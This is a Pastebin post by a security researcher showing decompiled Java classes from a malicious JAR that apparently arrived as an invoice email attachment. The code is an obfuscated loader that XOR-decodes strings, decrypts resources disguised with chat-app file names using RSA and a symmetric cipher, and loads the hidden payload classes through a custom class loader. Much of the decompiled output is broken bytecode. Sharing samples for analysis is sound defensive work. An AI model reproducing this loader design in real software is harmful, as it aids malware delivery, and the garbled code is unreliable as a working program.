API tools faq
paste
Advertisement
Neonprimetime

Malicious Jar files Invoice Email decompiled

Neonprimetime
Jun 1st, 2016
428
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 15.48 KB | None | 0 0
raw download clone embed print report
  1. Malicious Jar files Invoice Email decompiled
  2. *******
  3. *******
  4. *******
  5. // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
  6. // Jad home page: http://www.kpdus.com/jad.html
  7. // Decompiler options: packimports(3)
  8.  
  9. package BoNuS;
  10.  
  11.  
  12. // Referenced classes of package BoNuS:
  13. //            ue
  14.  
  15. public class BEER
  16. {
  17.  
  18.     public static void main(String b[])
  19.         throws Exception
  20.     {
  21.         ue a = new ue();
  22.     }
  23.  
  24.     public static String v(String a)
  25.     {
  26.         (3 ^ 5) << 3 ^ 1;
  27.         5 << 4 ^ 1 << 1;
  28.         (2 ^ 5) << 4 ^ (3 ^ 5) << 1;
  29.         int l = a.length();
  30.         l;
  31.         new char[l];
  32.         true;
  33.         true;
  34.         JVM INSTR pop2 ;
  35.         JVM INSTR swap ;
  36.         1;
  37.         JVM INSTR isub ;
  38.         JVM INSTR dup_x2 ;
  39.         int j;
  40.         j;
  41.         char ac[];
  42.         ac;
  43.         int k;
  44.         k;
  45.         int i;
  46.         i;
  47.         JVM INSTR pop ;
  48. _L4:
  49.         JVM INSTR iflt 87;
  50.            goto _L1 _L2
  51. _L1:
  52.         ac;
  53.         a;
  54.         j;
  55.         JVM INSTR dup_x1 ;
  56.         charAt();
  57.         j--;
  58.         i;
  59.         JVM INSTR ixor ;
  60.         (char);
  61.         JVM INSTR castore ;
  62.         if(j < 0) goto _L2; else goto _L3
  63. _L3:
  64.         ac;
  65.         a;
  66.         j--;
  67.         JVM INSTR dup_x1 ;
  68.         charAt();
  69.         k;
  70.         JVM INSTR ixor ;
  71.         (char);
  72.         JVM INSTR castore ;
  73.         j;
  74.           goto _L4
  75. _L2:
  76.         return new String(ac);
  77.     }
  78.  
  79.     public BEER()
  80.     {
  81.     }
  82. }
  83.  
  84.  
  85. *******
  86. // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
  87. // Jad home page: http://www.kpdus.com/jad.html
  88. // Decompiler options: packimports(3)
  89.  
  90. package BoNuS;
  91.  
  92. import java.io.ByteArrayInputStream;
  93. import java.util.HashMap;
  94. import java.util.jar.JarEntry;
  95. import java.util.jar.JarInputStream;
  96.  
  97. // Referenced classes of package BoNuS:
  98. //            ug, uk, ua, uw
  99.  
  100. public class uz
  101. {
  102.  
  103.     public uz(byte h[])
  104.         throws Exception
  105.     {
  106.         JarInputStream g;
  107.         JarInputStream jarinputstream;
  108.         jarinputstream = g = new JarInputStream(new ByteArrayInputStream(h));
  109.         jarinputstream;
  110.         String f;
  111.         HashMap d;
  112.         f = uk.v(jarinputstream);
  113.         d = new HashMap();
  114. _L4:
  115.         getNextJarEntry();
  116.         JVM INSTR dup ;
  117.         JarEntry e;
  118.         e;
  119.         JVM INSTR ifnull 93;
  120.            goto _L1 _L2
  121. _L1:
  122.         break MISSING_BLOCK_LABEL_44;
  123. _L2:
  124.         break; /* Loop/switch isn't completed */
  125.         if(!e.isDirectory())
  126.             break MISSING_BLOCK_LABEL_61;
  127.         g.closeEntry();
  128.         g;
  129.         continue; /* Loop/switch isn't completed */
  130.         g;
  131.         g;
  132.         JVM INSTR dup_x1 ;
  133.         ua.v();
  134.         byte b[];
  135.         b;
  136.         closeEntry();
  137.         String a = uw.v(e);
  138.         d.put(a, b);
  139.         if(true) goto _L4; else goto _L3
  140. _L3:
  141.         g.close();
  142.         ug c = new ug(f, d);
  143.         return;
  144.     }
  145. }
  146.  
  147. *******
  148.  
  149. // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
  150. // Jad home page: http://www.kpdus.com/jad.html
  151. // Decompiler options: packimports(3)
  152.  
  153. package BoNuS;
  154.  
  155. import java.awt.Button;
  156. import java.net.URL;
  157. import java.util.HashMap;
  158.  
  159. // Referenced classes of package BoNuS:
  160. //            uu, uj, up
  161.  
  162. public class ug extends uu
  163. {
  164.  
  165.     public ug(String b, HashMap a)
  166.         throws Exception
  167.     {
  168.         c;
  169.         0;
  170.         true;
  171.         true;
  172.         JVM INSTR pop2 ;
  173.         new URL[];
  174.         true;
  175.         true;
  176.         JVM INSTR pop2 ;
  177.         uu();
  178.         a;
  179.         c;
  180.         JVM INSTR dup_x1 ;
  181.         JVM INSTR dup_x2 ;
  182.         b;
  183.         z;
  184.         w;
  185.         v();
  186.     }
  187.  
  188.     private void v()
  189.         throws Exception
  190.     {
  191.         Class h;
  192.         Button i = new Button(up.v("Xi\\f"));
  193.         h = loadClass(z);
  194.         Button g = new Button(up.v("Xi\\f"));
  195.         Button f = new Button(up.v("Xi\\f"));
  196.         h;
  197.         up.v("Xi\\f");
  198.         1;
  199.         1;
  200.         1;
  201.         JVM INSTR pop2 ;
  202.         new Class[];
  203.         true;
  204.         true;
  205.         JVM INSTR pop2 ;
  206.         JVM INSTR dup ;
  207.         0;
  208.         true;
  209.         true;
  210.         JVM INSTR pop2 ;
  211.         [Ljava/lang/String;;
  212.         JVM INSTR aastore ;
  213.         getMethod();
  214.         java.lang.reflect.Method e;
  215.         e;
  216.         Button d = new Button(up.v("Xi\\f"));
  217.         Button c = new Button(up.v("Xi\\f"));
  218.         uj.v(e);
  219.         Button b = new Button(up.v("Xi\\f"));
  220.         Button a = new Button(up.v("Xi\\f"));
  221.         return;
  222.     }
  223. }
  224.  
  225.  
  226. *******
  227. // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
  228. // Jad home page: http://www.kpdus.com/jad.html
  229. // Decompiler options: packimports(3)
  230.  
  231. package BoNuS;
  232.  
  233. import java.util.jar.*;
  234.  
  235. // Referenced classes of package BoNuS:
  236. //            up
  237.  
  238. public class uk extends Manifest
  239. {
  240.  
  241.     public uk()
  242.     {
  243.     }
  244.  
  245.     public static String v(JarInputStream b)
  246.     {
  247.         Attributes attributes = b.getManifest().getMainAttributes();
  248.         JVM INSTR new #4   <Class java.util.jar.Attributes$Name>;
  249.         attributes;
  250.         JVM INSTR dup_x1 ;
  251.         JVM INSTR dup ;
  252.         JVM INSTR pop2 ;
  253.         JVM INSTR dup ;
  254.         up.v("xi\\f\030KYiF{");
  255.         java.util.jar.Attributes.Name();
  256.         getValue();
  257.         return;
  258.     }
  259. }
  260.  
  261.  
  262. ******
  263. // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
  264. // Jad home page: http://www.kpdus.com/jad.html
  265. // Decompiler options: packimports(3)
  266.  
  267. package BoNuS;
  268.  
  269. import java.awt.Button;
  270. import java.io.ByteArrayInputStream;
  271. import java.io.InputStream;
  272. import java.net.URL;
  273. import java.util.HashMap;
  274.  
  275. // Referenced classes of package BoNuS:
  276. //            up
  277.  
  278. public class us extends up
  279. {
  280.  
  281.     public InputStream getResourceAsStream(String j)
  282.     {
  283.         Button i = new Button(up.v("'"));
  284.         String h = j.replace(up.v("'"), up.v("&"));
  285.         Button g = new Button(up.v("'"));
  286.         if(w.containsKey(h))
  287.         {
  288.             Button f = new Button(up.v("'"));
  289.             byte d[] = (byte[])w.get(h);
  290.             Button c = new Button(up.v("'"));
  291.             ByteArrayInputStream b = new ByteArrayInputStream(d);
  292.             Button a = new Button(up.v("'"));
  293.             return b;
  294.         } else
  295.         {
  296.             Button e = new Button(up.v("'"));
  297.             return super.getResourceAsStream(j);
  298.         }
  299.     }
  300.  
  301.     public us(URL a[])
  302.     {
  303.         super(a);
  304.     }
  305. }
  306.  
  307.  
  308. *******
  309. // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
  310. // Jad home page: http://www.kpdus.com/jad.html
  311. // Decompiler options: packimports(3)
  312.  
  313. package BoNuS;
  314.  
  315. import java.net.URL;
  316. import java.util.HashMap;
  317.  
  318. // Referenced classes of package BoNuS:
  319. //            us, BEER
  320.  
  321. public class uu extends us
  322. {
  323.  
  324.     public uu(URL a[])
  325.     {
  326.         super(a);
  327.     }
  328.  
  329.     public Class findClass(String d)
  330.         throws ClassNotFoundException
  331.     {
  332.         Class c;
  333.         if((c = findLoadedClass(d)) != null)
  334.             return c;
  335.         c = findSystemClass(d);
  336.         c;
  337.           goto _L1
  338.         Exception exception;
  339.         exception;
  340.         c;
  341. _L1:
  342.         JVM INSTR ifnull 31;
  343.            goto _L2 _L3
  344. _L2:
  345.         break MISSING_BLOCK_LABEL_29;
  346. _L3:
  347.         break MISSING_BLOCK_LABEL_31;
  348.         return c;
  349.         byte b[];
  350.         java.security.ProtectionDomain a;
  351.         if((b = (byte[])w.get(d)) == null)
  352.             return super.findClass(d);
  353.         a = BoNuS/BEER.getProtectionDomain();
  354.         e;
  355.         d;
  356.         0;
  357.         true;
  358.         true;
  359.         JVM INSTR pop2 ;
  360.         b;
  361.         JVM INSTR dup_x1 ;
  362.         JVM INSTR arraylength .length;
  363.         a;
  364.         defineClass();
  365.         JVM INSTR dup ;
  366.         c;
  367.         return;
  368.     }
  369. }
  370.  
  371. *******
  372. // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
  373. // Jad home page: http://www.kpdus.com/jad.html
  374. // Decompiler options: packimports(3)
  375.  
  376. package BoNuS;
  377.  
  378. import java.util.jar.JarEntry;
  379.  
  380. // Referenced classes of package BoNuS:
  381. //            up
  382.  
  383. public class uw
  384. {
  385.  
  386.     public static String v(JarEntry a)
  387.     {
  388.         return a.getName().replace(up.v("'"), up.v("&")).replace(up.v("\033kYiF{"), "");
  389.     }
  390.  
  391.     public uw()
  392.     {
  393.     }
  394. }
  395.  
  396.  
  397. *******
  398. // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
  399. // Jad home page: http://www.kpdus.com/jad.html
  400. // Decompiler options: packimports(3)
  401.  
  402. package BoNuS;
  403.  
  404. import java.io.*;
  405.  
  406. public class ua
  407. {
  408.  
  409.     public static byte[] v(InputStream d)
  410.         throws IOException
  411.     {
  412.         2048;
  413.         true;
  414.         true;
  415.         JVM INSTR pop2 ;
  416.         new byte[];
  417.         true;
  418.         true;
  419.         JVM INSTR pop2 ;
  420.         byte b[];
  421.         b;
  422.         ByteArrayOutputStream a = new ByteArrayOutputStream();
  423.         d;
  424. _L3:
  425.         b;
  426.         read();
  427.         JVM INSTR dup ;
  428.         int c;
  429.         c;
  430.         -1;
  431.         true;
  432.         true;
  433.         JVM INSTR pop2 ;
  434.         JVM INSTR icmple 49;
  435.            goto _L1 _L2
  436. _L1:
  437.         d;
  438.         a;
  439.         b;
  440.         0;
  441.         true;
  442.         true;
  443.         JVM INSTR pop2 ;
  444.         c;
  445.         write();
  446.           goto _L3
  447. _L2:
  448.         a.close();
  449.         return a.toByteArray();
  450.     }
  451.  
  452.     public ua()
  453.     {
  454.     }
  455. }
  456.  
  457.  
  458. *******
  459. // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
  460. // Jad home page: http://www.kpdus.com/jad.html
  461. // Decompiler options: packimports(3)
  462.  
  463. package BoNuS;
  464.  
  465. import java.net.URL;
  466. import java.net.URLClassLoader;
  467. import java.util.HashMap;
  468.  
  469. public class up extends URLClassLoader
  470. {
  471.  
  472.     public up(URL a[])
  473.     {
  474.         b;
  475.         0;
  476.         true;
  477.         true;
  478.         JVM INSTR pop2 ;
  479.         new URL[];
  480.         true;
  481.         true;
  482.         JVM INSTR pop2 ;
  483.         URLClassLoader();
  484.     }
  485.  
  486.     public static String v(String a)
  487.     {
  488.         1 << 3;
  489.         5 << 4 ^ 3 << 1;
  490.         (3 ^ 5) << 3 ^ 5;
  491.         int l = a.length();
  492.         l;
  493.         new char[l];
  494.         true;
  495.         true;
  496.         JVM INSTR pop2 ;
  497.         JVM INSTR swap ;
  498.         1;
  499.         JVM INSTR isub ;
  500.         JVM INSTR dup_x2 ;
  501.         int j;
  502.         j;
  503.         char ac[];
  504.         ac;
  505.         int k;
  506.         k;
  507.         JVM INSTR dup_x2 ;
  508.         JVM INSTR pop2 ;
  509.         int i;
  510.         i;
  511. _L4:
  512.         JVM INSTR iflt 78;
  513.            goto _L1 _L2
  514. _L1:
  515.         ac;
  516.         a;
  517.         j;
  518.         JVM INSTR dup_x1 ;
  519.         charAt();
  520.         j--;
  521.         i;
  522.         JVM INSTR ixor ;
  523.         (char);
  524.         JVM INSTR castore ;
  525.         if(j < 0) goto _L2; else goto _L3
  526. _L3:
  527.         ac;
  528.         a;
  529.         j--;
  530.         JVM INSTR dup_x1 ;
  531.         charAt();
  532.         k;
  533.         JVM INSTR ixor ;
  534.         (char);
  535.         JVM INSTR castore ;
  536.         j;
  537.           goto _L4
  538. _L2:
  539.         return new String(ac);
  540.     }
  541.  
  542.     public HashMap w;
  543.     protected String z;
  544. }
  545.  
  546. *******
  547. // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
  548. // Jad home page: http://www.kpdus.com/jad.html
  549. // Decompiler options: packimports(3)
  550.  
  551. package BoNuS;
  552.  
  553. import java.security.GeneralSecurityException;
  554. import java.security.interfaces.RSAPrivateKey;
  555. import javax.crypto.Cipher;
  556. import javax.crypto.spec.SecretKeySpec;
  557.  
  558. // Referenced classes of package BoNuS:
  559. //            up
  560.  
  561. public class uq
  562. {
  563.  
  564.     public byte[] v(byte a[])
  565.         throws GeneralSecurityException
  566.     {
  567.         t;
  568.         2;
  569.         true;
  570.         true;
  571.         JVM INSTR pop2 ;
  572.         b;
  573.         JVM INSTR dup_x2 ;
  574.         w;
  575.         init();
  576.         t;
  577.         a;
  578.         doFinal();
  579.         return;
  580.     }
  581.  
  582.     public void v(RSAPrivateKey b, byte a[])
  583.         throws GeneralSecurityException
  584.     {
  585.         c;
  586.         c;
  587.         JVM INSTR dup2 ;
  588.         q;
  589.         2;
  590.         true;
  591.         true;
  592.         JVM INSTR pop2 ;
  593.         b;
  594.         init();
  595.         q;
  596.         a;
  597.         doFinal();
  598.         s;
  599.         JVM INSTR new #9   <Class SecretKeySpec>;
  600.         c;
  601.         c;
  602.         JVM INSTR pop2 ;
  603.         JVM INSTR dup ;
  604.         s;
  605.         up.v("Ip[");
  606.         SecretKeySpec();
  607.         w;
  608.     }
  609.  
  610.     public uq()
  611.         throws GeneralSecurityException
  612.     {
  613.         "ZfI";
  614.         a;
  615.         JVM INSTR dup_x1 ;
  616.         super();
  617.         Cipher.getInstance(up.v("Ip["));
  618.         t;
  619.         up.v();
  620.         Cipher.getInstance();
  621.         q;
  622.     }
  623.  
  624.     Cipher t;
  625.     byte s[];
  626.     Cipher q;
  627.     SecretKeySpec w;
  628.     RSAPrivateKey z;
  629. }
  630.  
  631. *******
  632. // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
  633. // Jad home page: http://www.kpdus.com/jad.html
  634. // Decompiler options: packimports(3)
  635.  
  636. package BoNuS;
  637.  
  638. import java.io.InputStream;
  639.  
  640. // Referenced classes of package BoNuS:
  641. //            BEER
  642.  
  643. public class ur
  644. {
  645.  
  646.     public static InputStream v(String a)
  647.     {
  648.         return BoNuS/BEER.getResourceAsStream(a);
  649.     }
  650.  
  651.     public ur()
  652.     {
  653.     }
  654. }
  655.  
  656. *******
  657. // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
  658. // Jad home page: http://www.kpdus.com/jad.html
  659. // Decompiler options: packimports(3)
  660.  
  661. package BoNuS;
  662.  
  663. import java.io.ByteArrayInputStream;
  664. import java.io.ObjectInputStream;
  665. import java.security.interfaces.RSAPrivateKey;
  666. import java.util.Properties;
  667.  
  668. // Referenced classes of package BoNuS:
  669. //            uq, uz, ur, ua,
  670. //            up
  671.  
  672. public class ue
  673. {
  674.  
  675.     public ue()
  676.         throws Exception
  677.     {
  678.         "/instagram/mobile/chat/generic/log.txt";
  679.         p;
  680.         JVM INSTR dup_x1 ;
  681.         "/jabber/server/website/listener.k";
  682.         "/telegram/chat/secure.db";
  683.         p;
  684.         JVM INSTR dup_x1 ;
  685.         Object();
  686.         w;
  687.         q;
  688.         z;
  689.         RSAPrivateKey n;
  690.         byte m[];
  691.         byte l[];
  692.         uq uq1;
  693.         ObjectInputStream objectinputstream;
  694.         n = (RSAPrivateKey)(objectinputstream = new ObjectInputStream(ur.v("/telegram/chat/secure.db"))).readObject();
  695.         m = ua.v(ur.v("/jabber/server/website/listener.k"));
  696.         l = ua.v(ur.v("/instagram/mobile/chat/generic/log.txt"));
  697.         uq1 = new uq();
  698.         l;
  699.         uq1;
  700.         JVM INSTR dup_x1 ;
  701.         n;
  702.         m;
  703.         v();
  704.         v();
  705.         byte j[];
  706.         j;
  707.         Properties i;
  708.         Properties properties = i = new Properties();
  709.         properties;
  710.         properties;
  711.         "eZ|^t\\pWeIf[bGgL";
  712.         i;
  713.         JVM INSTR dup_x2 ;
  714.         JVM INSTR new #21  <Class ByteArrayInputStream>;
  715.         i;
  716.         i;
  717.         JVM INSTR pop2 ;
  718.         JVM INSTR dup ;
  719.         j;
  720.         ByteArrayInputStream();
  721.         loadFromXML();
  722.         up.v();
  723.         getProperty();
  724.         String h;
  725.         h;
  726.         up.v("eIf[bGgLjKgQe\\pL");
  727.         getProperty();
  728.         String g;
  729.         g;
  730.         up.v("[pZcMgWeIa@");
  731.         getProperty();
  732.         String f;
  733.         f;
  734.         byte e[];
  735.         byte d[];
  736.         uq uq2;
  737.         ObjectInputStream o;
  738.         n = (RSAPrivateKey)(o = new ObjectInputStream(ur.v(h))).readObject();
  739.         e = ua.v(ur.v(g));
  740.         d = ua.v(ur.v(f));
  741.         uq2 = new uq();
  742.         d;
  743.         uq2;
  744.         JVM INSTR dup_x1 ;
  745.         n;
  746.         e;
  747.         v();
  748.         v();
  749.         byte b[];
  750.         b;
  751.         uz a = new uz(b);
  752.         return;
  753.     }
  754.  
  755.     private final String q = "/jabber/server/website/listener.k";
  756.     private final String w = "/telegram/chat/secure.db";
  757.     private final String z = "/instagram/mobile/chat/generic/log.txt";
  758. }
  759.  
  760.  
  761.  
  762. *******
  763. *******
  764. *******
  765. More FROM @neonprimetime security
  766.  
  767. http://pastebin.com/u/Neonprimetime
  768. https://www.virustotal.com/en/USER/neonprimetime/
  769. https://twitter.com/neonprimetime
  770. https://www.reddit.com/USER/neonprimetime
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!